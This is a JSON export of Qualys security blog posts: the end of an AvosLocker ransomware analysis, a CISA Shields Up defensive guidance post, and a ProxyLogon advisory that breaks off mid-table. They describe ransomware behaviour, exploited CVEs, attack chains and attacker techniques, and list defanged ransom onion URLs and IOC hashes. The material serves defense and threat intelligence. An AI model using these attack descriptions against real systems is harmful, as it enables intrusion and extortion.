mutex lock/unlock API for thread synchronization as shown in figure 31.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-31-Lock-Unlock-Mutex-For-Thread-Synchronization.png)Fig. 31: Lock-Unlock Mutex for Thread Synchronization\n\nBased on the number of threads specified, it creates concurrent CPU threads (fig. 32). This helps in encrypting different files simultaneously at a very fast speed.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-32-Create-Threads-In-Loop.png)Fig. 32: Create Threads in Loop\n\nAvosLocker\u2019s Linux variant makes use of Advanced Encryption Standard (AES) and elliptic-curve cryptography (ECC) algorithms for data encryption.\n\nFile-related information along with the encryption key used might be encrypted and then encoded with base 64 formats. This encoded information is added at the end of each encrypted file (fig. 33).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-33-File_Related_Info_Adde_At_End.png)Fig. 33: File-related Info added at the end\n\nFigure 34 shows the malware appending the extension \u201c.avoslinux\u201d to the encrypted file names.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-34-Files_Encrypted.png)Fig. 34: Append file extension \u201c.avoslinux\u201d after encryption\n\nBefore starting file encryption, it creates a ransom note named \u201cREADME_FOR_RESTORE \u201c. The content of this ransom note is shown in figure 35.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-35-RansomNote.png)Fig. 35: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with a TOR browser to pay the ransom and to obtain the decryption key and decryption application.\n\n### Indicators of Compromise (IOCs):\n \n \n Windows: C0A42741EEF72991D9D0EE8B6C0531FC19151457A8B59BDCF7B6373D1FE56E02\n \n \n Linux: 7C935DCD672C4854495F41008120288E8E1C144089F1F06A23BD0A0F52A544B1\n \n \n URL:\n hxxp://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad[.]onion.\n hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad[.]onion\n\n### TTP Map:\n\nInitial Access| Execution| Defense Evasion| Discovery| Impact \n---|---|---|---|--- \nPhishing (T1566)| User Execution \n(T1204)| Obfuscated Files or Information (T1027)| System Information Discovery (T1082)| Data Encrypted for Impact \n(T1486) \n| | | File and Directory Discovery (T1083)| Inhibit System Recovery \n(T1490)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-07T05:18:46", "type": "qualysblog", "title": "AvosLocker Ransomware Behavior Examined on Windows & Linux", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-07T05:18:46", "id": "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a governments\u2019 response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform****\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys is recommending all organizations to establish the following actionable steps to adopt heightened cybersecurity posture to protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of their potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/shodan-assets-1070x505.jpg)\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/Industrial-control-systems-1070x513.jpg)\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, report open ports, and detected services on each port. Qualys CSAM supports extensive query language that enables teams to report and act on detected external facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/open-ports-rdp-1070x406.jpg)\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software****\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/missing-antivirus-1070x686.jpg)\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/antvirus-signatures-1070x619.jpg)\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus such as Living-off-the-Land attacks as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys Researcher analyzed all the 300+ CVEs from CISA known exploited vulnerabilities and mapped them to the Qualys QIDs. Many of these CVEs have patches available for the past several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerabilities reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. \n\nFollowing are some of the critical vulnerabilities cataloged by CISA, as specifically known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create a patch and configuration fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities by downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed including the new vulnerabilities added to the CISA catalog in the future. \n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/zerotouch-1070x602.jpg)\n\n#### Monitor and ensure your software are always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life & end-of-support dates.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/csam-inventory-1070x575.jpg)\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk opposed. Prioritize your remediation efforts based on software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. \n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/prioritizationreport-1070x602.jpg)\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 are the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations****\n\nProtect your public cloud infrastructure by securing the following services on priority:\n\n * **IAM**: Ensure all users are MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/Picture6-1070x810.jpg)\n\n#### Protect your Office 365 and Other SaaS Services****\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with different admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/Picture7.png)\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/EDR-1070x512.jpg)\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-11T20:27:44", "description": "**Update March 10, 2021**: A new section describes how to respond with mitigation controls if patches cannot be applied, as recommended by Microsoft. This section details the Qualys Policy Compliance control ids for each vulnerability.\n\n**Update March 8, 2021**: Qualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. QID 50108 is available in VULNSIGS-2.5.125-3 version and above, and is available across all platforms as of March 8th, 1:38 AM ET. This QID is not applicable to agents, so the signature version for the agent will not be updated. QID: 50107, released in VULNSIGS-2.5.121-4 and Windows Cloud Agent manifest 2.5.121.4-3 and above, will accurately detect this vulnerability via agents.\n\n**Original Post**: On March 2nd, [Microsoft released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) a set of out-of-band security updates to address critical remote code execution vulnerabilities in Microsoft Exchange Server. According to Microsoft these vulnerabilities are actively being exploited in the wild, and hence it is recommended to patch them immediately.\n\nTo detect vulnerable instances, Qualys released QID 50107 which detects all vulnerable instances of Exchange server. This QID is included in VULNSIGS-2.5.121-4 version and above.\n\nCVEs addressed as part of this QID are: CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\nAmong the above CVEs, [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) are being actively targeted in the wild using zero-day exploits. Microsoft attributes these attacks with high confidence to the HAFNIUM (Chinese cyber spy) threat actor group. These vulnerabilities are related to the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\nAt the time of the security update release the vulnerabilities affect only on-premises Microsoft Exchange Server installations. Exchange online is not affected.\n\n### CVE Technical Details\n\n**[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)** is a Server-Side Request Forgery (SSRF) vulnerability that allows attackers to send arbitrary HTTP requests and authenticate to on-premises Exchange servers. Attackers can also trick the Exchange server to execute arbitrary commands by exploiting this vulnerability.\n\n**[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Attackers who successfully exploit this vulnerability can run their code as SYSTEM on the Exchange server. \n\n**[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>)** is a post-authentication arbitrary file write vulnerability in Exchange. Exploiting this vulnerability could allow an attacker to write a file to any part of the target Exchange server. Attackers exploiting this vulnerability could write a file to any path on the target Exchange server.\n\n**[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)** is a post-authentication arbitrary file write vulnerability in Exchange. Similar to CVE-2021-26858, exploiting this vulnerability could allow an attacker to write a file to any path of the target Exchange server.\n\n### Attack Chain\n\nMicrosoft has provided details regarding how the HAFNIUM (threat actor) group is exploiting the above-mentioned critical CVEs. Following sequence of steps summarizes Microsoft\u2019s findings.\n\n 1. The initial step in the attack chain includes the threat actor group making an untrusted connection to the target Exchange server (on port 443) using CVE-2021-26855.\n 2. After successfully establishing the connection, the threat actor group exploits CVE-2021-26857 that gives them ability to run code as SYSTEM on the target Exchange server. This requires administrator permission or another vulnerability to exploit.\n 3. As part of their post-authentication actions, the threat actor group exploits [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) and proceeds to writing files to any path of the target server.\n\nIt has been observed that after gaining the initial access, the threat actor group deployed web shells on the target compromised server.\n\nFollowing table shows the MITRE ATT&CK Technique and Tactic details.\n\n**Tactic**| **Technique**| **Sub-Technique**| **TID** \n---|---|---|--- \nReconnaissance| Gather Victim Identity Information| Email Addresses| T1589.002 